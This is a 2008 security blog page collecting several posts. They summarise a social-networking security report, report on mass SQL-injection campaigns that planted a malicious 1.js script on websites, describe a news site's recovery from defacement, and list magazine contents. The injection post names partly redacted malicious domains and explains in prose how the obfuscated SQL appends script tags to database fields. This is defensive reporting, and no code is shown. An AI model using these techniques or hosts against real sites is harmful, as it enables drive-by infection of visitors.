This paper aims to provide a useful introduction to security issues in the area of Social Networking, highlight the most important threats and make recommendations for action and best practices to reduce the security risks to users. Examples are given from a number of providers throughout the paper. These should be taken as examples only and there is no intention to single out a specific provider for criticism or praise. The examples provided are not necessarily those most representative or important, nor is the aim of this paper to conduct any kind of market survey, as there might be other providers which are not mentioned here and nonetheless are equally or more representative of the market.

Audience

This paper is aimed at corporate and political decision-makers as well as Social Network application-providers. It also seeks to raise awareness among political and corporate
decision-makers of the legal and social implications of new developments in Social Networking technologies. In particular, the findings should have important implications for education and data protection policy.

Some recommendations of the report are:

• Recommendation SN.1 Encourage awareness-raising and educational campaigns
• Recommendation SN.2 Review and reinterpret the regulatory framework
• Recommendation SN.3 Increase transparency of data handling practices
• Recommendation SN.4 Discourage the banning of SNSs in schools
• Recommendation SN.5 Promote stronger authentication and access-control where appropriate
• .....

Download full report here.

Update: Chris gates also refers to the following two presentations (thanks!!):

Presentations on Maltego:
CansecWest07 Presentation [PPT] (1.8MB)
FIRST 2007 Presentation [PPT] (4.5MB)

Related articles:

• This is how good the targeted attacks are getting
• Panda Labs Jan-Mar 2008 Report published
• Social engineering put to the test. How would your employee score?
• Don't make life difficult
• Security.nl, Maarten, social engineering and targeted attacks
• Social engineering pentesting against your employees (UPDATED)

Mass malware SQL injections still continuing and the number of Belgian sites infected

In the last weeks and months, several campaigns targeted a lot of websites to inject them with a malicious javascript. Mainly through SQL injections. High profile websites, like for example CNET.com, were also a victim to these attacks. It seems that they are at it again. A lot of websites got infected with "1.js" including UK government sites, and a United Nations website, "events.un.org". It was only last December when the UN website also got hacked through an SQL injection.

This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.

There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here. Mentioned in that diary entry is http://www.2117[removed].net. Our blog on that attack can be found here. It appears that same tool was used to orchestrate this attack too.

When we first started tracking the use of this domain, the malicious JavaScript was still making use of http://www.nmida[removed].com/:

Now the attackers are referring to a file hosted on the new domain of http://www.nihao[removed].com:

Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search results below.

The number of sites affected is in the hundreds of thousands (Source: Websense)

Read full post here.

At the moment, Google shows some 177.000 websites infected. And please don't visit them with Javascript enabled. Use your Google Foo.



I was curious how many Belgian websites got infected. Ladies and gentlemen of the jury, it's 56!!!



My first instinct was to report this but my next thought was, to whom? I don't have time to track the webmasters down one by one. And Belgium doesn't have a CERT to contact. We do have the FCCU (Federal Computer Crime Unit) but that is partly a forensics team, not a nation wide CERT. *sigh*

I left them a message anyway. Let's hope it will do some good.

Sophos has some more information about the SQL injection technique used.

This morning, I was investigating another attack that is most likely related. The target of the malicious script tag has changed, but the underlying malicious SQL is very similar. The malicious injection can be seen below:

As you can see, the main guts of the malicious SQL (within @S) are obfuscated within the CAST(0x…) block (which is trimmed for clarity). Decryption is trivial, enabling us to identify how the attack works.

In brief, the SQL will concatenate a malicious script tag into all (n)text and (n)varchar fields of all user tables in the MS SQL database. Nasty. Particularly for webmasters who have been hit, leaving them with a cumbersome cleanup process, and the challenge of preventing the same attack hitting them again.

And the purpose of the attack? Feeding the 1.js file into our automation system, we see a whole mass of pages that will get loaded as a result of browsing a compromised page. This is represented in the flowchart below (click to enlarge):

• yellow blob: malicious 1.js file loaded from compromised pages
• green arrows: page loads via an iframe (or similar)
• red arrows: exploit payload, in this case resulting in the download of some Win32 malware

Read their full analysis.

Update (23/04/2008): I got a response from the FCCU and the BELNET CERT has taken over the case. Their priority is of course to their constituency (BELNET). But as only CERT in Belgium, they try to be a "last resort" point of contact as long as their resources will allow it. That's very nice to hear!!! I might have a meeting with them in the future to exchange some ideas.

In the meantime, the number of infected sites displayed has mounted up to 273.000 and the infected belgian sites up to 93.

Related articles:

• Mass website infections from January solved
• More drive-by infections and iframe SEO poisening
• The source code of the Javascript injection attack of last week
• Attack of the Killer iframes and the javascript infections

How did The Sports Network recover from the chinese defacement?

During an attack on CNN, the Sports Network got defaced because the Chinese hackers thought they were a part of CNN. But they were only a source for CNN.

So how did TSN recover from the attack? The Zdnet blog Zeroday has some information on it.

The company’s sports information and wire service was the priority when SportsNetwork brought its operations back up. Within a few hours, SportsNetwork, which primarily competes with Stats Inc., was serving its feeds to thousands of customers, which range from portals to most newspapers in the U.S. The data feeds (example right) represent the bulk of SportsNetwork’s revenue. The company’s site serves more as marketing showcase.

The lesson: Recover the revenue generating tools first. Sports Network, based in Hatboro, PA, has about 130 employees, a CTO and about 18 developers working on the site.

Will Sports Network change its security policies? Charles said on the security front his company had “all the things that everyone has” and noted that it’s obvious that his firm will have to do more. The challenge is that any change the company makes will have to be echoed by more than 1,000 customers.

Sports Network may speed up plans to add another layer of security, but is leaving the planning to his CTO. Whatever Sports Network does it’ll have to do so quickly. “The irony is we’re sending a gang of people to Beijing for the Olympics,” says Charles.

Read the full article.

Do you have an incident response plan? Did you test it? Do you have good backups?

Related topics:

• Update on CNN.com attacks, slightly down but (not) defaced (UPDATED)
  
• DDoS Attack on CNN, cancelled or delayed? An overview.
• How to start a Computer Security Incident Response

(IN)SECURE Magazine Issue 16 released

• Security policy considerations for virtual worlds
• US political elections and cybercrime
• Using packet analysis for network troubleshooting
• The effectiveness of industry certifications
• Is your data safe? Secure your web apps
• RSA Conference 2008 / Black Hat 2008 Europe
• Windows log forensics: did you cover your tracks?
• Traditional vs. non-tranditional database auditing
• Payment card data: know your defense options
• Security risks for mobile computing on public WLANs: hotspot registration
• Network event analysis with Net/FSE
• Producing secure software with security enhanced software development processes
• AND MORE!

Download issue here.

Related articles:

• McAfee's Magazine Sage 3 - The Globalization of Malware
• Info-Security Magazine Jan-Feb Released
• (IN)SECURE Magazine Issue 15 released
• Magazine: Infosecurity November/December issue
• (IN)SECURE Magazine Issue 14 released